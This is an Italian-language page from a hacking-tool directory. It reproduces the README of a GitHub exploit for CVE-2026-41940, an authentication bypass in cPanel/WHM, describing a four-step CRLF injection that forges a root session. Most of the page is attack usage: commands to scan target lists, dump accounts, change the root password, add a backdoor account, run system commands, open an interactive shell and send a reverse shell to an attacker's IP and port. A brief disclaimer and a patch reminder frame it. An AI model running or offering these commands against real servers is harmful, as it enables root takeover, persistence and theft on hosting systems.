Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41940 — cPanel/WHM Bypass dell'autenticazione (Vulnerabilità zero-day) | Kitploit
Strumenti/GitHubGitHub/kill1234545/cve-2026-41940
Autenticazione e AutorizzazioneEscalation di PrivilegiMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration Testing
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

cPanel/WHM Bypass dell'autenticazione (Vulnerabilità zero-day)

Vedi Repository
1023 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41940: Bypass dell'autenticazione cPanel/WHM (singolo e multi-target)

Disclaimer: Questo documento e lo script associato (exploit.py) sono forniti esclusivamente a scopo didattico, di ricerca sulla sicurezza e di test di penetrazione autorizzati. Non utilizzare questo software contro sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita al test.

Panoramica

exploit.py è uno script che dimostra una vulnerabilità di bypass dell'autenticazione (CVE-2026-41940) in cPanel & WHM. La vulnerabilità consente a un attaccante non autenticato di iniettare una sessione root nella cache del daemon tramite un difetto di iniezione CRLF, ottenendo infine accesso WHM a livello root senza richiedere credenziali valide.

Analisi della vulnerabilità e flusso dell'exploit

L'exploit sfrutta una vulnerabilità di iniezione CRLF (Carriage Return Line Feed) all'interno del meccanismo di gestione dell'Authenticazione di Base, combinata con un difetto di propagazione della sessione. Lo script automatizza l'attacco in quattro fasi:

  1. Creazione di una sessione pre-autenticazione: Si connette agli endpoint di login pubblici (es. /login/ o /cgi/login.cgi) per ottenere un cookie di sessione non autenticato di base (whostmgrsession).
  2. Iniezione CRLF: Invia un header di Authenticazione di Base appositamente costruito contenente un payload codificato in Base64 che inietta i campi della sessione root direttamente nella cache di sessione di cpsrvd. La risposta di redirect del server rilascia il token di sicurezza generato (cpsess).
  3. Propagazione della sessione: Il cookie di sessione grezzo viene inviato a un endpoint WHM autenticato, innescando do_token_denied per propagare la sessione falsificata nella cache del daemon — rendendola una sessione autenticata valida.
  4. Verifica: Accede agli endpoint API WHM riservati (es. /json-api/version) utilizzando la sessione falsificata per confermare l'accesso a livello root.

Prerequisiti

  • Python 3.x
  • Libreria requests
root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Argomenti

Selezione del target

ArgomentoDescrizione
--target URLSingolo URL WHM (es. https://target:2087)
--target-file FILEFile con i target (uno ip:port per riga) — abilita automaticamente la modalità check

Opzioni di rete e principali

Opzioni di sfruttamento (post-bypass)

Opzioni di output

ArgomentoDescrizione
--output FILESalva il token di sessione e i dettagli in un file JSON

Esempi

root@kitploit:~
# Verifica se il target è vulnerabile
python exploit.py --target https://target:2087 --check

# Scarica le informazioni del server (versione, account, privilegi)
python exploit.py --target https://target:2087 --dump

# Genera un URL di login root a un clic (incollalo subito nel browser)
python exploit.py --target https://target:2087 --session

# Esegue un comando
python exploit.py --target https://target:2087 --exec "id"

# Apre una shell WHM interattiva
python exploit.py --target https://target:2087 --shell

# Cambia la password di root
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Chiama direttamente l'API WHM
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Crea un account cPanel backdoor
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Invia una reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Sovrascrive l'hostname (da usare quando l'auto-discovery fallisce)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scansiona più target (modalità solo verifica)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Salva la sessione in un file
python exploit.py --target https://target:2087 --dump --output results.json

Comandi della shell interattiva

Quando si usa --shell, sono disponibili i seguenti comandi:


Promemoria

Applica immediatamente le ultime patch di sicurezza di cPanel/WHM.

Scarica lo strumento
ArgomentoDescrizione
--threads NThread concorrenti per la modalità multi-target (default: 10)
--hostname HOSTSovrascrive l'header Host — da usare quando l'auto-discovery fallisce o restituisce un hostname errato
--timeout NTimeout per richiesta in secondi (default: 15)
--retries NNumero di tentativi in caso di errori di rete (default: 3)
--cookie-name NAMEForza un nome specifico per il cookie di sessione (rilevato automaticamente se omesso)
--no-verifySalta la verifica della Fase 4 e procedi comunque
ArgomentoDescrizione
--checkModalità solo verifica — controlla la vulnerabilità senza sfruttarla (impostata automaticamente con --target-file)
--password PASSCambia la password di root in PASS
--api FUNCChiama una specifica funzione WHM JSON-API
--api-params K=V,...Parametri separati da virgola per --api
--exec CMDEsegue un comando di sistema tramite WHM scripts/run_script (fallback: rawexec)
--sessionGenera un URL di login root a un clic — aprilo subito, il token scade rapidamente
--shellApre una shell WHM interattiva (solo target singolo)
--dumpScarica le informazioni del server: versione, account, zone DNS, privilegi
--add-user USER PASS DOMAINCrea un nuovo account di hosting cPanel
--revshell LHOST LPORTInvia una reverse shell bash al tuo listener
ComandoDescrizione
api <function> [k=v ...]Chiama una funzione WHM JSON-API (es. api version)
exec <command>Esegue un comando di sistema tramite WHM (es. exec id)
passwd <newpass>Cambia la password di root
dumpScarica le informazioni del server
revshell <lhost> <lport>Invia una reverse shell
add <user> <pass> <domain>Crea un account cPanel
save <path>Salva la sessione corrente in un file
exit / quitEsce dalla shell